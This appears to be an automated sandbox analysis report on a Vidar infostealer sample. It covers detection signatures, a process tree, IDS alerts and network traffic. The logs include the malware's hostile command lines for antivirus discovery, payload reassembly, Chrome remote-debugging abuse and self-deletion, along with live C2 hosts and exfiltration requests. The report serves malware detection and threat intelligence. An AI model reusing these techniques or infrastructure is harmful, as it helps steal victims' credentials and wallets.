Edit tour

Windows Analysis Report
RisingStrip.exe

Overview

General Information

Sample name:	RisingStrip.exe
Analysis ID:	1583753
MD5:	754abb74ca81d5ac0338dc27c0419467
SHA1:	6b1266ea2b305178dc1b7bd17e4bf22c2ef6417e
SHA256:	ea8c2ccdcad3914c89165d94a5916986ee9ba4fbccce3563eaa5facba38cceb6
Tags:	exevidaruser-msz
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Classification

Process Tree

System is w10x64

RisingStrip.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\RisingStrip.exe" MD5: 754ABB74CA81D5AC0338DC27C0419467)

cmd.exe (PID: 7340 cmdline: "C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7424 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7432 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7468 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7476 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7512 cmdline: cmd /c md 91531 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7524 cmdline: extrac32 /Y /E Shepherd MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7544 cmdline: findstr /V "copyrighted" Tell MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7560 cmdline: cmd /c copy /b 91531\Red.com + Certificates + Mountain + Hydraulic + Advances + Am + Belongs + Housing + Viral + Bound 91531\Red.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7576 cmdline: cmd /c copy /b ..\Generated + ..\Er + ..\Soma + ..\Sponsors + ..\Identifies + ..\Phentermine + ..\Applying + ..\October q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Red.com (PID: 7592 cmdline: Red.com q MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 8012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2184,i,6651775337915312218,4819002569926656069,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 6404 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com" & rd /s /q "C:\ProgramData\y5xtj" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2032 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 7608 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Red.com q, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com, ParentProcessId: 7592, ParentProcessName: Red.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8012, ProcessName: chrome.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7340, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7476, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:30:35.312388+0100	2044247	1	Malware Command and Control Activity Detected	116.203.13.109	443	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:30:36.696968+0100	2051831	1	Malware Command and Control Activity Detected	116.203.13.109	443	192.168.2.4	49744	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:30:36.696783+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49744	116.203.13.109	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:30:32.465077+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49741	116.203.13.109	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: RisingStrip.exe	Virustotal: Detection: 26%			Perma Link
Source: RisingStrip.exe	ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.9% probability

Source: RisingStrip.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: RisingStrip.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 0MB later: 41MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49744 -> 116.203.13.109:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49741 -> 116.203.13.109:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.13.109:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.13.109:443 -> 192.168.2.4:49743

Source: global traffic

HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: trufai.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 00000011.00000003.2118430170.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2118593603.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2118337262.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000011.00000003.2118430170.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2118593603.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2118337262.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;

Source: global traffic	DNS traffic detected: DNS query: yOVsZEivtLSqqovnrmQMTfS.yOVsZEivtLSqqovnrmQMTfS
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: trufai.website
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----u3ecjek6fcj58ycbsj58User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: trufai.websiteContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RisingStrip.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
